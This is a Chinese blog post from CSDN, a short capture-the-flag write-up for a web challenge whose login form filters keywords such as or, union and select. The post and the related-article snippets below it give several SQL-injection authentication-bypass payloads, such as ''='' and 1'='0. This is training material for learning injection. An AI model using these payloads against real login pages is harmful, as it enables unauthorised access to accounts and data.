登陆一下好吗 SQL

最新推荐文章于 2020-12-19 10:53:12 发布
最新推荐文章于 2020-12-19 10:53:12 发布
阅读量170 收藏
点赞数
分类专栏: 实验吧 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40776369/article/details/83316472
版权

地址:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

参考资料:https://blog.csdn.net/wy_97/article/details/75635661 https://blog.csdn.net/qq_35078631/article/details/54782596
补充资料:https://blog.csdn.net/LANVNAL/article/details/56965963

在这里插入图片描述

在这里插入图片描述
分析: * / select union or 都被过滤

猜测后台查询语句:$sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”;


username:1
password:1

$sql ="select user from flag where user='1' and password='1' ";

目前的目的是成功登陆,即SQL查询不报错

构造:
username:’=’
password:’=’

效果:$sql ="select user from flag where user='NULL'='NULL' and password='NULL'='NULL' "; 【单引号中的内容为空,条件成立,未报错】【万能密码】
在这里插入图片描述

雨九九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF实验吧-WEB专题-1
qq_18661257的专栏
12-19 6711
1.登陆一下好吗?? 题解 抓住sql语句的性质,构造万能密码,可以使t'='来突破题目的限制,原因如下: 一般的验证SQL语句为: select * from user where username='xxx' and password='xxx' 当我们我们的表单提交t'='时,SQL语句就变成了 select * from user where username='t'='' an
SQL2000登陆.rar
04-05
标题“SQL2000登陆.rar”提示我们这个压缩包可能包含了与使用SQL Server 2000登录相关的源代码,可能是用易语言编写的。易语言是一种中国本土的编程语言,设计目标是让编程变得简单易学。下面我们将深入探讨SQL ...
web——ctf (登陆一下好吗??)
h1012946585的博客
04-08 5715
登陆一下好吗??  不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈!flag格式:ctf{xxxx} 解题链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html                     ...
实验吧登陆一下好吗??WP
Yale的博客
03-19 9382
登陆一下好吗??(http://www.shiyanbar.com/ctf/1942) username= 1’=’0 password= 1’=’0 或者 username=what’=’ password=what’=’ 或者 username:admin’=’ password:admin’=’ 得到ctf{51d1bf8fb65a8c2406513ee8f522
CTF实验吧-登陆一下好吗??【false SQL注入】
Sp4rkW的博客
07-21 4811
原题链接:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 第一次见到这个,首先的想法自然是or,还有bp看看有没有什么可能存在flag的地方,思考许久,实在想不到,参考了大佬们的write up 思路都是 admin-> ‘=’ password-> '=' 不难猜到数据库存取数据时语句为 $sql = “...
CTF-登陆一下好么?
Grey的博客
05-04 1350
、select * from user where username='用户名' and password='密码'  利用  1'='1  0'='0这样显然不行,因为查询到数据库中没有username=1 的元组,返回了0而  0 !='1'  所以需要改为  username= 1'='0password= 1'='0先看前面username那一块,由于两个等号是从左往右计算的,userna...
易语言登陆器连接sql
07-20
在“易语言登陆器连接SQL”这个主题中,我们将深入探讨如何使用易语言来创建一个登陆器程序,并使其能够与SQL数据库进行交互。 首先,我们需要了解SQL,它是Structured Query Language的缩写,是一种用于管理关系...
SQL Server创建账号及登陆的相关问题
12-14
前提:Window身份验证能成功登陆  创建方式:使用Microsoft SQL Server Management Studio 工具  步骤:  1. 使用Window身份验证登陆  2. 可在“安全性”底下找到一个“登陆名”的标签(目录)  3. “登陆...
AndroidStudio版登陆界面加直连Sqlserver
04-19
综上所述,"AndroidStudio版登陆界面加直连Sqlserver"项目涵盖了Android UI设计、网络编程、数据库操作和异常处理等多方面知识,对于初学者来说,这是一个很好的实践项目,可以帮助理解Android应用与远程数据库交互...
远程登陆SQL Server 2014数据库的方法
09-09
主要为大家详细介绍了远程登陆SQL Server 2014数据库的方法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
实验吧——WEB-登陆一下好吗??
迷风小白
04-03 2699
登陆一下好吗?? 拿到题目第一反应应该是sql注入,试一下万能密码('or 1=1 or '1) 发现or被过滤掉了,我们可以大胆猜测一下后台sql查询语句 $sql = “select user from flag where user=’\$_POST[‘user’]’ and password=’\$_POST[‘password’]’”; 接下来就是构造语句来绕过判断 userna...
登陆一下好吗
stloztoeplitz的博客
12-24 396
Sql注入,username=pcat’=’&password=pcat’=’ 提交后变成了:username=’pcat’=” AND password=’pcat’=” 巧妙的构造了连个万能钥匙,主要利用了引号的错位,多个等号,已经一下的知识点: 1=’1’ 1=’1.0’ 1=’1后接字母(再后面有数字也可以)’ 0=’除了非0数字开头的字符串’http://www.2cto.co
登录一下好吗??
weixin_42430107的博客
07-19 286
写博客真不容易,火狐浏览器崩了三次。 开始正题,登录就想到万能密码登录,用万能密码进行登录尝试,初次使用'or'='or'进行尝试,发现显示无“=”用户,再次用万能密码尝试admin' or 'a'='a 为用户名,密码随意写尝试登录,直接爆出flag,不得不说运气非常好。 具体原理不敢随便,到技术达到时应该会补充上 ...
登陆一下好么?
qq_31798427的博客
02-15 1618
这个题过滤了绝大多数东西,然而留下了最关键的单引号。 但真只剩下单引号可用了还真搞不定,参考别人wp后学到了两种方法: (1)双等号绕过。 假设sql语句如下: select * from user where username='用户名' and password='密码'现在我们知道单引号和等号没有被过滤(这个题目是只过滤指定字符,测试一下就知道哪些被过滤了),那么可以用一下pay
[CTF]No.0004 [实验吧]登陆一下好吗??
林毅洋
08-25 834
[CTF]No.0004 [实验吧]登陆一下好吗??来源:实验吧-决斗场-WEB 类别:SQL注入 来源:http://www.shiyanbar.com/ctf/1942 用到工具:无尝试进入网址,得到一下界面 随意输入,返回 返回首页,对关键字进行检测 使用andor'@#进行登陆,可以看到返回 可知,or、#被过滤掉了构造SQL猜测程序中使用的sql语句select
CTF实验吧-Web ----登陆一下好吗??
kallaa的博客
07-14 928
登陆一下好吗?? 不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈! flag格式:ctf{xxxx} 类型:sql注入 题目分析: 1.利用常规的方法猜解,输入 '单引号,发现没有被过滤。 2.接着输入and 1=1,and 1=2,/ # -- select or union |等都被过滤掉。 3.sql语句为: select * f
unity 使用mysql实现登录注册_结合mysql实现用户的注册和登录功能-练习
weixin_39623671的博客
12-19 249
1. 为你的库准备数据drop database db1; # 小心create database db1 charset utf8;use db1;create table user(id int primary key auto_increment, username varchar(255) not null unique, password varchar(255), unique ke...
决斗场 - 实验吧 WEB 登陆一下好吗??
RaAlGhul的博客
11-09 796
题目链接:http://www.shiyanbar.com/ctf/1942 这是一道关于sql注入的问题。 不知道小编是不是太笨,反正我第一次看的时候一脸懵逼,完全没有头绪(T.T),看了大神们的题解才有了思路。 此题是个登陆界面,登陆的过程其实可以归纳为读取页面上的username的字符串str,在数据库中查找str对应的密码是否和页面上的password的字符串past
CTF之登录一下好吗?
Unitue_逆流
04-09 1207
实验吧链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html 输入如下手工进行注入:
登陆注册功能连接sql2012
最新发布
06-09
要建立登陆注册功能并连接 SQL Server 2012 数据库,您需要使用 Java 和 JDBC API。以下是基本步骤: 1. 创建数据库:首先,在 SQL Server Management Studio 中创建一个新的数据库。对于本例,我们假设数据库名称...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值